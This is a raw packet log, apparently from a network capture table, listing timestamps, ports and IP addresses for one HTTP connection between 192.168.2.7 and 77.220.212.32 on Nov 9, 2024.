Nov 9, 2024 02:47:11.094070911 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094080925 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094094038 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094105959 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.094106913 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094127893 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.094150066 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.094916105 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094927073 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094938040 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094949961 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094960928 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094976902 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.094980001 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.094991922 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.095004082 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.095004082 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.095004082 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.095035076 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.095789909 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.095801115 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.095812082 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.095823050 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.095834970 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.095839024 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.095844984 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.095858097 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.095865011 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.095892906 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211200953 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211224079 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211390972 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211402893 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211406946 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211412907 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211424112 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211442947 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211453915 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211466074 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211466074 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211473942 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211478949 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211487055 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211492062 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211502075 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211519957 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211543083 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211571932 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211694956 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211705923 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211715937 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211750984 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211782932 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211800098 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211850882 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211884975 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211895943 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211908102 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.211934090 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.211956978 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212111950 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212153912 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212162971 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212165117 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212197065 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212228060 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212239027 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212249994 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212265968 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212276936 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212276936 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212317944 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212513924 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212560892 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212567091 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212578058 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212605953 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212629080 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212631941 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212645054 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212656021 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212666988 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212672949 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212697029 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212723970 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212724924 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212734938 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212757111 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212779999 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212789059 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212800980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212810993 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212821960 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212831974 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212835073 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.212848902 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.212874889 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.213511944 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213558912 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.213691950 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213704109 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213715076 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213726044 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213736057 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213747025 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213757992 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213768959 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213774920 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.213782072 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213793039 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213797092 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.213804007 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213814020 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213826895 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.213849068 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.213872910 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.214454889 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.214466095 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.214477062 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.214495897 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.214508057 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.214509964 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.214519024 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.214536905 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.214545012 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.214555979 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.214556932 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.214566946 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.214577913 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.214591980 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.214620113 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216464043 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216475964 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216486931 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216499090 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216511965 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216531992 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216545105 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216568947 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216582060 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216603994 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216619968 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216625929 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216634035 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216645956 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216648102 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216655016 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216676950 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216689110 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216712952 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216725111 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216736078 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216747999 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216758966 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.216762066 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216788054 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.216798067 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217231035 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217248917 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217268944 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217278957 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217282057 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217294931 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217313051 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217313051 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217323065 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217344999 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217622995 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217633963 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217652082 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217663050 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217674971 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217674971 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217685938 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217698097 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217704058 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217710018 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217720032 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217720032 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217732906 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217745066 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217746019 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217756987 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217768908 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.217772961 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217792988 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.217811108 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331139088 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331157923 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331170082 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331187963 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331201077 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331247091 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331350088 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331547022 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331558943 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331571102 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331583977 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331599951 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331603050 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331612110 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331624031 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331629038 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331644058 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331660986 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331660986 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331670046 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331686020 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331700087 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331707001 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331717968 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331728935 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331738949 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331739902 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331751108 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331762075 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331772089 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331778049 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331779957 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331788063 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331799030 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331800938 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331815004 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331820011 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331832886 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331842899 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331844091 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331854105 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331855059 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331866026 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331885099 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331885099 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331898928 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331899881 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331912994 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331918001 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331933975 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331937075 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331948042 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331959009 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331970930 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331975937 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.331984997 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.331995964 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332000971 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332007885 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332027912 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332056046 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332072973 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332084894 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332096100 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332108021 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332112074 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332118988 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332148075 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332168102 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332171917 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332180023 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332190037 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332215071 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332241058 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332250118 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332262039 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332273006 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332290888 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332297087 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332304955 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332314968 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332321882 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332357883 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332397938 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332408905 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332420111 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332436085 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332439899 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332458973 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332463026 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332469940 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332480907 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332485914 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332493067 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332504034 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332515001 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332515955 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332545042 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332567930 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332632065 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332643032 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332653999 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332673073 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332679033 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332684994 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332696915 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332705021 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332710028 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332735062 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332758904 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332763910 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332776070 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332787991 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332798958 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332806110 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332865953 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.332951069 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332962990 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332981110 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332992077 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.332993984 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333003998 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333014965 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333014965 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333026886 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333039045 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333039045 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333051920 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333061934 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333075047 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333076000 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333098888 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333116055 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333120108 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333131075 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333142042 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333162069 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333173990 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333272934 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333291054 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333301067 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333319902 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333323002 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333332062 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333342075 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333349943 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333354950 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333368063 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333380938 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333400965 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.333408117 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333408117 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.333414078 CET	80	49699	77.220.212.32	192.168.2.7
